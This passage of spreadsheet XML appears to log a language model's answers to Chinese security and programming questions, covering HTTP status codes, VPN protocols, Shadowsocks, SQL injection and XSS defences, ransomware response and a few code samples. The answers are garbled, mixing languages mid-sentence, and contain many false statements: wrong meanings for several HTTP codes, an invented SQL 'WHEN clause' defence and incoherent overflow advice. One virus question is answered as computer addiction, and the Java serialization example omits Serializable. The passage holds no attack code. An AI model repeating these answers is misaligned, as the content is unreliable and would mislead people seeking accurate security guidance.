      <c r="C113" t="inlineStr">
        <is>
          <t>？
HTTP 响应码是指服务器端返回客户端的一个数字代码，用于指示客户端是否 erfolgreich 请求。HTTP 响应码分为以下几种：
1xx 状态码：表示请求是成功的，但没有任何数据返回。
* 100 Continue：表示客户端的请求符合服务器端的预期，但服务器端还没有处理请求。
* 101 Switching Protocols：表示服务器端升级到新的协议。
2xx 状态码：表示请求是成功的，并且服务器端返回了数据。
* 200 OK：表示请求是成功的，并且服务器端返回了请求的数据。
* 201 Created：表示服务器端创建了新的资源，并返回了资源的 Location Header。
* 202 Accepted：表示服务器端接受了请求，但服务器端的资源 Currently Unavailable 或预约尚未实现。
* 203 Non-Authoritative Information：表示服务器端返回了另一个资源，该资源不是客户端请求的资源。
* 204 No Content：表示请求是成功的，但服务器端没有返回任何数据。
* 205 Reset Content：表示请求是成功的，但服务器端返回了新的数据，用于替代原始数据。
3xx 状态码：表示请求需要重新进行，或者客户端需要重新发送请求。
* 300 Multiple Choices：表示服务器端返回了多个可用资源，客户端需要选择哪一个资源。
* 301 Moved Permanently：表示服务器端搬 trasfer 了资源，客户端需要重新获取资源。
* 302 Found：表示服务器端搬 transfer 了资源，但客户端可以继续使用原始资源。
* 303 See Other：表示服务器端返回了其他资源，客户端需要重新获取资源。
* 304 Not Modified：表示客户端的请求的资源未变，服务器端没有返回任何数据。
4xx 状态码：表示客户端的请求有误，或者客户端没有执行准备好的请求。
* 400 Bad Request：表示客户端的请求无效或错误。
* 401 Unauthorized：表示客户端没有授权，或者客户端的授权已经过期。
* 402 Payment Required：表示客户端的请求需要支付费用。
* 403 Forbidden：表示客户端没有权限访问资源。
* 404 Not Found：表示客户端的请求没有找到相应的资源。
* 405 Method Not Allowed：表示客户端的请求使用的方法不允许。
5xx 状态码：表示服务器端的</t>
        </is>
      </c>
      <c r="D113" t="n">
        <v>26.58223152160645</v>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="1" t="n">
        <v>112</v>
      </c>
      <c r="B114" t="inlineStr">
        <is>
          <t>什么是HTTPS</t>
        </is>
      </c>
      <c r="C114" t="inlineStr">
        <is>
          <t>？
HTTPS（Hypertext Transfer Protocol Secure）是HTTP的安全升级版，它使用SSL（Secure Sockets Layer）或TLS（Transport Layer Security）协议来保护网络上的数据交互。HTTPS通过加密请求和响应数据，以防止恶意攻击者 intercept 或 tamper 电子邮件、个人信息等，同时还可以确保数据的身份验证和数据Integrity。
HTTPS的主要特点包括：
1. 加密：HTTPS使用加密技术来保护请求和响应数据，防止恶意攻击者 intercept 或 tamper 数据。
2. 身份验证：HTTPS使用证书来 authenticate 服务器的身份，防止恶意攻击者 masquerading 成合法的服务器。
3. 数据Integrity：HTTPS使用加密技术来保护数据的完整性和integrity，防止恶意攻击者 modify 或 tamper 数据。
4. 权利证：HTTPS使用证书来签名请求和响应数据，防止恶意攻击者 modify 或 tamper 数据。
5. 安全协议：HTTPS使用安全协议来保护数据的交互，防止恶意攻击者 interfere 或 tamper 数据。
总之，HTTPS是HTTP的安全升级版，可以保护网络上的数据交互，防止恶意攻击者 intercept 或 tamper 数据，同时还可以确保数据的身份验证和数据Integrity。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D114" t="n">
        <v>14.03022599220276</v>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="1" t="n">
        <v>113</v>
      </c>
      <c r="B115" t="inlineStr">
        <is>
          <t>有哪些VPN协议</t>
        </is>
      </c>
      <c r="C115" t="inlineStr">
        <is>
          <t>？
VPN（虚拟专用网络）是一种技术，允许用户在互联网上进行安全和透明的通信。以下是常见的VPN协议：
1. OpenVPN：OpenVPN 是一个开源的 VPN 协议，具有较高的安全性和可靠性。它使用 SSL/TLS 协议进行加密和证明，并可以在多种操作系统上使用。
2. L2TP/IPSec：L2TP/IPSec 是一种基于Layer 2（传输层）的VPN协议，它使用的是加密和证明的IPSec协议。L2TP/IPSec 具有高度的安全性和可靠性，但需要更多的配置和管理。
3. PPTP：Point-to-Point Tunneling Protocol（点对点隧道协议）是一种远程访问VPN协议，它使用的是MPPE（Multiprotocol Password Encryption）协议进行加密。PPTP 具有较低的配置和管理复杂度，但安全性较低。
4. IKEv2：Internet Key Exchange version 2（互联网键exchange2）是一种安全的VPN协议，它使用的是可靠的symmetric encryption和非对称加密。IKEv2 具有较高的安全性和可靠性，但需要更多的配置和管理。
5. SSH（Secure Shell）：SSH 是一种安全的Remote Access协议，它可以在多种操作系统上使用，但不是一种专门的VPN协议。SSH 具有较高的安全性和可靠性，但需要更多的配置和管理。
6. SSL/TLS：Secure Sockets Layer/Transport Layer Security（安全сокет层/传输层安全）是一种安全的协议，它可以在多种操作系统上使用，但不是一种专门的VPN协议。SSL/TLS 具有较高的安全性和可靠性，但需要更多的配置和管理。
这些协议都有各自的优缺点和应用场景， selects the most appropriate VPN protocol for your needs.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D115" t="n">
        <v>19.23310112953186</v>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="1" t="n">
        <v>114</v>
      </c>
      <c r="B116" t="inlineStr">
        <is>
          <t>Shadowsocks是什么</t>
        </is>
      </c>
      <c r="C116" t="inlineStr">
        <is>
          <t>？
Shadowsocks是一个开源的跨平台、安全的VPN工具，可以在多种操作系统上使用，包括Linux、Mac OS、Windows等。它的主要特点是具有以下几个优点：
1. 安全性：Shadowsocks使用安全的 encryption algorithm，可以减少攻击者的阻挡和监听。
2. 隐蔽性：Shadowsocks可以隐藏用户的网络活动，使其difficult to detect和 block。
3. 多态性：Shadowsocks支持多种VPN protocols，可以根据不同的情况选择最适合的协议。
4. 跨平台支持：Shadowsocks可以在多种操作系统上使用，包括Linux、Mac OS、Windows等。
5. 开源：Shadowsocks是开源的，可以免费使用和修改。
Shadowsocks的主要应用场景包括：
1. 隐蔽网络活动：Shadowsocks可以隐藏用户的网络活动，保护用户的隐私和安全。
2. 跨国连接：Shadowsocks可以跨国连接，帮助用户访问境外的网站和服务。
3. 避免网络审查：Shadowsocks可以避免国家的网络审查和监控。
4. 安全上网：Shadowsocks可以提供一个安全的网络连接，防止恶意软件和攻击者攻击用户的计算机。
总之，Shadowsocks是一个安全、隐蔽、多态的VPN工具，可以帮助用户隐藏网络活动，保护隐私和安全，并且可以在多种操作系统上使用。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D116" t="n">
        <v>15.33157229423523</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="1" t="n">
        <v>115</v>
      </c>
      <c r="B117" t="inlineStr">
        <is>
          <t>RDP是什么协议</t>
        </is>
      </c>
      <c r="C117" t="inlineStr">
        <is>
          <t>？ 
RDP stands for Remote Desktop Protocol. It is a communication protocol that allows users to remotely access and control another computer over a network connection. RDP is commonly used to remotely access and control a computer running the Windows operating system, but it can also be used to access and control other types of computers and devices.
RDP is a widely used protocol, and it is supported by many different operating systems and platforms, including Windows, macOS, Linux, and mobile devices. RDP allows users to connect to a remote computer using a variety of clients, including the built-in Remote Desktop client in Windows, third-party clients like TeamViewer or LogMeIn, or even mobile apps like Remote Desktop for iOS or Android.
Once a user has connected to a remote computer using RDP, they can use the remote desktop to interact with the computer's desktop and applications as if they were sitting in front of it. This allows users to access and control the remote computer's files, applications, and hardware remotely, which can be useful for a variety of purposes, such as working remotely, providing technical support, or accessing a computer for maintenance or troubleshooting.
RDP is a powerful and versatile protocol that offers many features and benefits, including:
* Remote access to a computer's desktop and applications
* Full keyboard and mouse control over the remote computer
* Ability to transfer files and data between the remote and local computers
* Support for multiple monitors and resolutions
* Encryption and security features to protect the remote connection
* Integration with other Microsoft technologies, such as Active Directory and Azure
Overall, RDP is an important protocol that enables users to remotely access and control computers over a network connection, making it a valuable tool for a wide range of applications and use cases.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D117" t="n">
        <v>10.22894668579102</v>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="1" t="n">
        <v>116</v>
      </c>
      <c r="B118" t="inlineStr">
        <is>
          <t>如何在开发中避免SQL注入漏洞</t>
        </is>
      </c>
      <c r="C118" t="inlineStr">
        <is>
          <t>？
SQL注入是一种常见的web应用程序漏洞，它可以让攻击者在web应用程序中执行任意的SQL语句，从而导致数据丢失、安全漏洞和威胁。以下是一些有效的方法来避免SQL注入漏洞在开发中：
1. 使用 Parameterized Query：使用Parameterized Query可以避免 directly injecting user input into the SQL query. By using parameterized queries, you can bind the user input to a parameter, which will be passed to the database as a parameter, rather than being incorporated directly into the SQL query.
2. 使用Prepared Statements：Prepared statements are a type of stored procedure that can be used to execute a SQL query. By using prepared statements, you can avoid SQL injection by providing a pre-defined SQL query, rather than constructing the query dynamically.
3. 避免使用user input directly into SQL queries： avoid using user input directly into SQL queries. Instead, use parameterized queries or stored procedures to execute the SQL query.
4. 使用WHEN clause：use the WHEN clause to validate user input before inserting it into the SQL query. This can help prevent SQL injection attacks by ensuring that only valid input is used in the query.
5. 使用Limitations on input：limit the input that can be used in the SQL query. For example, you can limit the length of the input or the types of characters that can be used in the input.
6. 使用Output escaping：use output escaping to escape any special characters in the output. This can help prevent SQL injection attacks by ensuring that any special characters in the output are properly escaped.
7. 使用security frameworks：use security frameworks such as OWASP ESAPI or Spring Security to help protect against SQL injection attacks. These frameworks provide a range of features and tools to help protect against SQL injection and other security threats.
8. 使用Automated testing：use automated testing to test your application for SQL injection vulnerabilities. This can help identify any vulnerabilities and allow you to fix them before they can be exploited by an attacker.
9. 使用Web application firewalls：use web application firewalls (WAFs) to protect your application from SQL injection attacks. WAFs can help detect and prevent SQL injection attacks by filtering incoming traffic and blocking any suspicious activity.
10. 使用Regular expression validation：use regular expression validation to validate user input before inserting it into the SQL query. This can help prevent SQL injection attacks by ensuring that only valid input is used in the query.
By following these tips, you can help protect your web application from SQL injection attacks and ensure that your data remains secure.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D118" t="n">
        <v>16.79712128639221</v>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="1" t="n">
        <v>117</v>
      </c>
      <c r="B119" t="inlineStr">
        <is>
          <t>如何在开发中避免越权漏洞</t>
        </is>
      </c>
      <c r="C119" t="inlineStr">
        <is>
          <t>？
在开发中，避免越权漏洞是非常重要的。越权漏洞是指在程序代码中，某个功能或数据被访问或修改了，导致程序运行时出现异常或泄露情况。以下是避免越权漏洞的一些建议：
1. 使用权限管理：在开发中，使用权限管理是非常重要的。通过限制每个用户或角色的访问权限，可以避免越权漏洞。例如，只允许特定角色访问特定的数据或功能。
2. 验证用户input：在开发中，需要对用户输入进行严格验证，避免越权漏洞。例如，不要直接使用用户输入来访问数据库或访问其他功能。
3. 使用安全编程技术：使用安全编程技术，例如，使用SQL注入防御和 cross-site scripting（XSS）防御等。
4. 采用Role-Based Access Control（RBAC）：RBAC是一种权限管理技术，可以让开发人员根据用户的角色来决定访问权限。
5. 使用权限模型：使用权限模型，例如，使用ACL（访问控制列表）来管理权限。
6. 避免使用hardcoded权限：避免在程序代码中使用硬编码的权限，因为这可能会导致越权漏洞。
7. 使用权限检查：在程序运行时，使用权限检查来验证用户的权限，避免越权漏洞。
8. 采用权限验证：采用权限验证，例如，使用权限验证模块来验证用户的权限。
9. 避免使用default权限：避免在程序代码中使用默认权限，因为这可能会导致越权漏洞。
10. 通过权限审核：通过权限审核来确保权限的有效性，避免越权漏洞。
总之，避免越权漏洞需要在开发中严格遵循权限管理原则，使用安全编程技术和权限管理工具，并通过权限审核和权限验证来确保权限的有效性。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D119" t="n">
        <v>22.82029390335083</v>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="1" t="n">
        <v>118</v>
      </c>
      <c r="B120" t="inlineStr">
        <is>
          <t>如何在开发中避免溢出漏洞</t>
        </is>
      </c>
      <c r="C120" t="inlineStr">
        <is>
          <t>？
在开发中，溢出漏洞是一种常见的安全漏洞，可能会导致数据泄露或者远程执行代码。以下是一些避免溢出漏洞的方法：
1.  validation 和检查：在数据 Binding 时，务必对数据进行正确的 Validation 和检查。检查数据是否符合预期的格式和范围，并执行适当的操作，如抛出异常或终止循环，以防止数据泄露。
2. 使用授权：在访问数据时，务必使用授权机制，如访问控制列表（ACL）或授权 Token。这样可以防止非法访问数据，从而避免溢出漏洞。
3. 使用静态分配：在数据 Binding 时，使用静态分配的方式可以避免溢出漏洞。通过在数据 Binding 时使用静态分配的方式，可以确保数据的访问权限是稳定的，从而避免溢出漏洞。
4. 使用排除机制：在数据 Binding 时，可以使用排除机制，如防火墙或者排除规则，来避免溢出漏洞。这样可以确保数据仅有合法的访问者可以访问。
5. 使用拦截器：在数据 Binding 时，可以使用拦截器，如防火墙或者拦截器，来避免溢出漏洞。这样可以确保数据仅有合法的访问者可以访问。
6. 使用最佳 Practice：在数据 Binding 时，务必遵守最佳 Practice，如验证数据的范围和格式，并遵循安全标准和建议。这样可以确保数据的安全性和可靠性。
7. 使用针对的机制：在数据 Binding 时，可以使用针对的机制，如针对的数据库接口或者针对的分布式系统，来避免溢出漏洞。这样可以确保数据仅有合法的访问者可以访问。
8. 使用安全框架：在数据 Binding 时，可以使用安全框架，如Spring Security 或者 OWASP，来避免溢出漏洞。这样可以确保数据的安全性和可靠性。
总之，避免溢出漏洞需要在数据 Binding 时遵循最佳 Practice，使用适当的机制和措施，并在需要时使用安全框架和拦截器等工具。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D120" t="n">
        <v>24.43250584602356</v>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="1" t="n">
        <v>119</v>
      </c>
      <c r="B121" t="inlineStr">
        <is>
          <t>如何避免XSS攻击</t>
        </is>
      </c>
      <c r="C121" t="inlineStr">
        <is>
          <t>？
XSS（Cross-Site Scripting）是一种常见的攻击方式，通过填充敏感资料（例如， cookies、user agent）或通过使用JavaScript来访问Web应用程序的敏感数据。这可能会导致用户遭受安全隐患，例如，竊取用户凭据，或者在用户的屏幕上显示不当的内容。
以下是一些避免XSS攻击的方法：
1. 避免直接使用用户提供的数据
在Web应用程序中，不要直接使用用户提供的数据，例如，cookie值或user agent。可以使用HTTP请求中的数据来替代这些数据。
2. 使用HTMLSanitization
HTMLSanitization是一种可以帮助避免XSS攻击的技术。它可以将用户提供的数据转换为安全的形式，以避免 direct injection of malicious code。
3. 使用Content Security Policy
Content Security Policy (CSP) 是一种可以帮助避免XSS攻击的技术。它可以声明允许的资源，从而避免访问非法资源。
4. 使用Nonce
Nonce是一种可以帮助避免XSS攻击的技术。它可以在Web应用程序中使用一个唯一的值，以防止重复访问。
5. 避免使用JavaScript
JavaScript可以用来访问Web应用程序的敏感数据，因此，可以避免使用JavaScript来处理敏感数据。
6. 使用安全的数据交互机制
可以使用安全的数据交互机制，例如，使用HTTPS，使用验证和签名等方式来保护数据的安全性。
7. 避免使用敏感数据在URL中
可以避免使用敏感数据在URL中，例如，不要使用cookie值或user agent在URL中。
8. 避免使用敏感数据在数据请求中
可以避免使用敏感数据在数据请求中，例如，不要在数据请求中包含敏感数据。
9. 避免使用敏感数据在数据响应中
可以避免使用敏感数据在数据响应中，例如，不要在数据响应中包含敏感数据。
10. 避免使用敏感数据在Web应用程序中
可以避免使用敏感数据在Web应用程序中，例如，不要在Web应用程序中使用敏感数据。
总之，避免XSS攻击需要constant vigilance和常规的安全做法。具体实现方式可以根据具体情况进行定制。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D121" t="n">
        <v>25.85814666748047</v>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="1" t="n">
        <v>120</v>
      </c>
      <c r="B122" t="inlineStr">
        <is>
          <t>网络安全风险三要素指什么</t>
        </is>
      </c>
      <c r="C122" t="inlineStr">
        <is>
          <t>？
Network security risks are potential threats to the confidentiality, integrity, and availability of a network and its resources. The three key elements of network security risks are:
1. Threats: These are the sources of potential danger to the network, such as hackers, malware, and unauthorized access. Threats can come from within or outside the organization and can be intentional or unintentional.
2. Vulnerabilities: These are weaknesses or flaws in the network or its systems that can be exploited by threats to gain unauthorized access or cause damage. Vulnerabilities can be caused by outdated software, unpatched systems, or insufficient security measures.
3. Assets: These are the valuable resources that are protected by the network security measures, such as sensitive data, intellectual property, and critical infrastructure. Assets can be compromised or disrupted by security breaches, leading to financial loss, reputational damage, or other negative consequences.
By understanding and managing these three key elements of network security risks, organizations can minimize the likelihood and impact of security incidents and protect their assets from potential threats.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D122" t="n">
        <v>6.716228723526001</v>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="1" t="n">
        <v>121</v>
      </c>
      <c r="B123" t="inlineStr">
        <is>
          <t>网络安全风险评估的主要步骤是什么</t>
        </is>
      </c>
      <c r="C123" t="inlineStr">
        <is>
          <t>？
网络安全风险评估的主要步骤包括：
1. 明确网络安全风险的范围：确定网络系统和数据对公司和用户的潜在威胁，例如黑客攻击、恶意软件、数据泄露等。
2. 评估网络安全风险的严重程度：评估网络风险的可能性和影响程度，例如风险的可能性、影响范围和潜在损失。
3. 评估网络安全风险的源头：分析网络风险的来源，例如人为错误、技术缺陷、恶意攻击等。
4. 评估网络安全风险的影响：评估网络风险对公司和用户的影响，例如数据泄露、网络干扰、系统崩溃等。
5. 制定网络安全风险管理计划：根据评估结果，制定有效的网络安全风险管理计划，例如风险评估、风险评估、风险管理等。
6. 实施网络安全风险管理措施：根据网络安全风险管理计划，实施有效的网络安全风险管理措施，例如安全软件、防火墙、安全策略等。
7. 监测和更新：定期监测网络安全风险，更新网络安全风险评估和管理计划，以确保网络安全风险管理的有效性。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D123" t="n">
        <v>16.96672296524048</v>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="1" t="n">
        <v>122</v>
      </c>
      <c r="B124" t="inlineStr">
        <is>
          <t>应急响应的流程是什么</t>
        </is>
      </c>
      <c r="C124" t="inlineStr">
        <is>
          <t>？
应急响应是指在各种情况下，能够快速、有效地应对和扑眶问题的过程。以下是一般应急响应的流程：
1. 报警：当一个事件或情况发生时，需要立即报警，通常是通过电话、短信、电子邮件等方式。
2. 评估：响应者应该立即评估事件的严重性和影响，并确定需要执行哪些措施。
3. 部署防御力：根据评估结果，响应者应该快速部署防御力，例如派遣人员、执行特殊任务、投入资源等。
4. 评估情况：在防御力部署后，响应者应该 kontinuously 评估事件的情况，了解是否需要更多的措施，或者是否可以减少现有的措施。
5. 撤离和恢复：在响应进行到一定程度后，响应者应该考虑撤离当地人员和资产，并恢复正常的社会秩序和经济活动。
6. 复杂性管理：在某些情况下，应急响应可能会遇到复杂性，例如多个受影响方面、多个领导管理等。在这些情况下，响应者应该能够有效地管理复杂性，实现协同的响应。
7. 后续评估：在响应完成后，响应者应该进行有效的评价和学习，了解是否有任何改进可以进行，以便在未来可以更好地应对类似情况。
总之，应急响应的流程包括报警、评估、部署防御力、评估情况、撤离和恢复、复杂性管理和后续评估等步骤，响应者需要能够快速、有效地应对和扑眶问题，以确保社会秩序和经济活动的不断发展。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D124" t="n">
        <v>20.32963681221008</v>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="1" t="n">
        <v>123</v>
      </c>
      <c r="B125" t="inlineStr">
        <is>
          <t>主机中了挖矿木马，如何处置</t>
        </is>
      </c>
      <c r="C125" t="inlineStr">
        <is>
          <t>？
您的主机上可能已经被挖矿了，这可能是一个潜在的安全隐患。为了防止攻击者使用您的主机来执行恶意操作，您需要尽可能速地处置您的主机。
以下是一些处置挖矿木马的建议：
1. 尽可能速地更新您的主机和软件。这可以减少攻击者的入侵机会。
2. 停止访问您的主机的任何不安全的网站或应用程序。这可以避免攻击者使用您的主机来执行恶意操作。
3. 使用安全软件来协助您扫描您的主机并找到挖矿木马。这些软件可以帮助您快速地找到和清除攻击者的恶意软件。
4. 如果您的主机已经被挖矿，请尽可能速地升级到最新的操作系统和安全软件。这可以减少攻击者的入侵机会。
5. 如果您的主机已经被挖矿，请尽可能速地寻求专业帮助。安全专家可以帮助您找到和清除攻击者的恶意软件，并提供有关安全的建议。
请注意，处置挖矿木马的过程可能需要一些时间和精力，但是它是保护您的主机和数据的关键步骤。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D125" t="n">
        <v>14.11928367614746</v>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="1" t="n">
        <v>124</v>
      </c>
      <c r="B126" t="inlineStr">
        <is>
          <t>我的电脑中了勒索病毒，怎么办</t>
        </is>
      </c>
      <c r="C126" t="inlineStr">
        <is>
          <t>？
我的电脑中了勒索病毒，怎么办？
勒索病毒（Ransomware）是一种危险的软件，它可以循环翻译您的数据，并对您进行费用要求，以换取您的数据的解压。如果您的电脑中了勒索病毒，以下是一些有用的步骤，可以帮助您解决这个问题：
1. 停止使用电脑：勒索病毒通常会要求您支付费用，以解压您的数据。因此，您应该停止使用电脑，直到您能够得到专业帮助。
2. 备份数据：如果您的数据已经受到勒索病毒的攻击，那么备份数据是很重要的。您可以使用 clouds 服务或者备份软件来备份您的数据。
3. 更新操作系统和软件：勒索病毒通常会攻击您的操作系统和软件的漏洞。因此，您应该尽可能地更新操作系统和软件，以避免勒索病毒的攻击。
4. 使用反勒索软件：有些软件可以帮助您解决勒索病毒的问题。例如，Malwarebytes、Kaspersky 和 Avast 等软件可以帮助您找到和消灭勒索病毒。
5. 寻求专业帮助：如果您无法解决勒索病毒的问题，您可以寻求专业帮助。您可以随时联系电脑医生或者其他专业的人来解决问题。
总之，如果您的电脑中了勒索病毒，您应该 acted 迅速，以避免损失您的数据。您可以通过停止使用电脑、备份数据、更新操作系统和软件、使用反勒索软件和寻求专业帮助等方式来解决这个问题。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D126" t="n">
        <v>20.34660005569458</v>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="1" t="n">
        <v>125</v>
      </c>
      <c r="B127" t="inlineStr">
        <is>
          <t>电脑中毒了怎么办</t>
        </is>
      </c>
      <c r="C127" t="inlineStr">
        <is>
          <t>？How to deal with computer addiction?
Computer addiction, also known as internet addiction or digital addiction, is a behavioral disorder characterized by excessive use of computers or other digital devices, to the point where it interferes with daily life and relationships. If you or someone you know is struggling with computer addiction, here are some steps you can take to address the problem:
1. Seek professional help: Computer addiction is a recognized disorder, and seeking help from a mental health professional is the first step towards recovery. A therapist can help you identify the underlying causes of your addiction and develop strategies for managing it.
2. Set boundaries: Establishing boundaries around computer use can help you avoid falling into the cycle of addiction. For example, you may decide to limit your computer use to certain hours of the day or to certain activities, such as work or socializing.
3. Find alternative activities: Engaging in activities that are not computer-related can help you break the cycle of addiction. This could include exercise, hobbies, or spending time with friends and family.
4. Use software tools: There are many software tools available that can help you manage your computer use. For example, you can use time management software to track how much time you spend on your computer, or you can use website blockers to limit your access to certain websites.
5. Practice self-care: Taking care of yourself is essential for overcoming computer addiction. This can include getting enough sleep, eating a healthy diet, and engaging in relaxation techniques such as meditation or yoga.
6. Seek support: Having a support system can be helpful for overcoming computer addiction. This could include joining a support group or seeking the help of friends and family.
7. Take breaks: Taking regular breaks from your computer can help you avoid the cycle of addiction. This could include taking a walk, reading a book, or engaging in a hobby.
8. Set realistic goals: Setting realistic goals can help you stay motivated and on track. For example, you may decide to limit your computer use to only a certain number of hours per day, or to avoid using your computer for certain activities, such as social media or online gaming.
9. Monitor progress: Monitoring your progress can help you stay motivated and on track. This could include tracking your computer use, setting goals, and celebrating your successes.
10. Be patient: Overcoming computer addiction is a process that takes time and effort. It is important to be patient with yourself and to recognize that setbacks are a normal part of the recovery process.
In conclusion, computer addiction is a serious issue that can have negative consequences for your mental and physical health. However, by seeking professional help, setting boundaries, and practicing self-care, you can overcome computer addiction and lead a healthier, more balanced life.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D127" t="n">
        <v>16.44144296646118</v>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="1" t="n">
        <v>126</v>
      </c>
      <c r="B128" t="inlineStr">
        <is>
          <t>为什么网页打不开了</t>
        </is>
      </c>
      <c r="C128" t="inlineStr">
        <is>
          <t>？
如果您的网页不能打开，可能有以下原因：
1. 网络连接不稳定：网页可能无法打开，如果您的网络连接不稳定或者无法连接到网络，这可能导致网页无法打开。
2. 网站不可用：您可能无法访问某个网站，可能是因为网站进行维护或者受到技术问题的影响。
3. 浏览器错误：您的浏览器可能有问题，导致网页无法打开。这可能是由于浏览器的更新或者静态检查的问题。
4. 安全警告：您可能会收到安全警告，指示您不要访问某个网站。这可能是因为网站存在恶意软件或者其他安全隐患。
5. 防火墙或者扫描器问题：如果您的防火墙或者扫描器不允许访问某个网站，那么网页可能无法打开。
6. 浏览器扩展问题：您的浏览器可能受到扩展程序的影响，导致网页无法打开。
7. 系统问题：您的操作系统或者浏览器可能有问题，导致网页无法打开。
如果您的网页仍然无法打开，可以尝试尝试其他浏览器或者升级您的浏览器。如果问题仍然存在，可以寻求技术支持或者咨询专业人士。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D128" t="n">
        <v>14.76042580604553</v>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="1" t="n">
        <v>127</v>
      </c>
      <c r="B129" t="inlineStr">
        <is>
          <t>用python写一个快速排序算法</t>
        </is>
      </c>
      <c r="C129" t="inlineStr">
        <is>
          <t>快速排序（Quicksort）是一种快速、高效的排序算法。它的基本思想是将数据分为两个部分，一个是小于或等于中间元素的元素，另一个是大于中间元素的元素。然后对这两个部分进行排序，重复这个过程直到整个数据集都排序完成。
在Python中，可以使用以下代码实现快速排序算法：
```
def quicksort(arr):
    if len(arr) &lt;= 1:
        return arr
    else:
        pivot = arr[0]
        less = [x for x in arr[1:] if x &lt;= pivot]
        greater = [x for x in arr[1:] if x &gt; pivot]
        return quicksort(less) + [pivot] + quicksort(greater)
```
这个函数首先 checks if the length of the array is less than or equal to 1, if it is, it returns the array unchanged. Otherwise, it selects the first element of the array as the pivot, and divides the rest of the array into two parts: those elements that are less than or equal to the pivot, and those that are greater than the pivot. Then it recursively applies the quicksort algorithm to the less elements, and then to the greater elements.
You can test the function by passing in a list of integers, for example:
```
arr = [3, 6, 1, 8, 2, 4]
print(quicksort(arr))
```
This will output the sorted list: `[1, 2, 3, 4, 6, 8]`.
You can also use the `timeit` module to measure the time it takes to sort different sized lists:
```
import timeit
arr = [3, 6, 1, 8, 2, 4]
timeit.timeit(lambda: quicksort(arr), number=100)
```
This will output the time it takes to sort the list 100 times.
Note: This is a basic implementation of the quicksort algorithm, there are many optimizations and variations of the algorithm that can be used in different scenarios, such as sorting large datasets, or using different data structures.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D129" t="n">
        <v>14.44775199890137</v>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="1" t="n">
        <v>128</v>
      </c>
      <c r="B130" t="inlineStr">
        <is>
          <t>使用Java语言将一个对象序列化</t>
        </is>
      </c>
      <c r="C130" t="inlineStr">
        <is>
          <t>成一个字节数组，并将其 deserialized 回原始对象
```
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
public class SerializeDeserialize {
    public static void main(String[] args) throws Exception {
        Person person = new Person("Jack", 30);
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(person);
        byte[] serializedData = bos.toByteArray();
        ByteArrayInputStream bis = new ByteArrayInputStream(serializedData);
        ObjectInputStream ois = new ObjectInputStream(bis);
        Person deserializedPerson = (Person) ois.readObject();
        System.out.println(deserializedPerson);
    }
}
class Person {
    private String name;
    private int age;
    public Person(String name, int age) {
        this.name = name;
        this.age = age;
    }
    public String getName() {
        return name;
    }
    public int getAge() {
        return age;
    }
}
```
在上面的代码中，我们首先创建了一个 `Person` 对象，然后使用 `ByteArrayOutputStream` 和 `ObjectOutputStream` 将其序列化成一个字节数组。接着，我们使用 `ByteArrayInputStream` 和 `ObjectInputStream` 将其 deserialized 回原始对象。
需要注意的是，在序列化和 deserialization 过程中，我们需要使用 `writeObject` 和 `readObject` 方法，这些方法可以将对象序列化成字节数组，并将其 deserialized 回原始对象。
在这个例子中，我们使用了 `Person` 类来测试 serialization 和 deserialization 的过程，但是你可以使用任何类或对象来测试。
在 serialization 过程中，我们使用 `ObjectOutputStream` 将对象写到字节数组中，并将其 serialized 成一个字节数组。在 deserialization 过程中，我们使用 `ObjectInputStream` 将字节数组解析成一个对象。
在序列化和 deserialization 过程中，我们需要考虑一些问题，例如：
* 是否使用了自定义Serializable接口，以便在序列化和 deserialization 过程中进行自定义处理。
* 是否使用了泛型，以便在序列化和 deserialization 过程中使用泛型的对象。
* 是否使用了不同的数据类型，例如，如果你需要序列化一个整数，你可以使用 `Integer` 类来实现。
总之，使用 Java 语言将一个对象序列化成一个字节数组，并将其 deserialized 回原始对象，是一个简单且有效的过程，可以用于各种应用程序中。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D130" t="n">
        <v>21.36724281311035</v>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="1" t="n">
        <v>129</v>
      </c>
      <c r="B131" t="inlineStr">
        <is>
          <t>使用Golang写一个爬虫</t>
        </is>
      </c>
      <c r="C131" t="inlineStr">
        <is>
          <t>使用Golang写一个爬虫，可以爬取某个网站的所有内容，并将其保存在文件中。
首先，我们需要使用`net/http`包来发送HTTP请求，并读取响应的内容。使用`strings`包来处理和分割响应的内容。
下面是一个简单的爬虫示例，可以爬取某个网站的所有内容：
```go
package main
import (
	"fmt"
	"io/ioutil"
	"net/http"
	"strings"
)
func main() {
	url := "https://www.example.com" // 要爬取的网站URL
	page, err := http.Get(url)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer page.Body.Close()
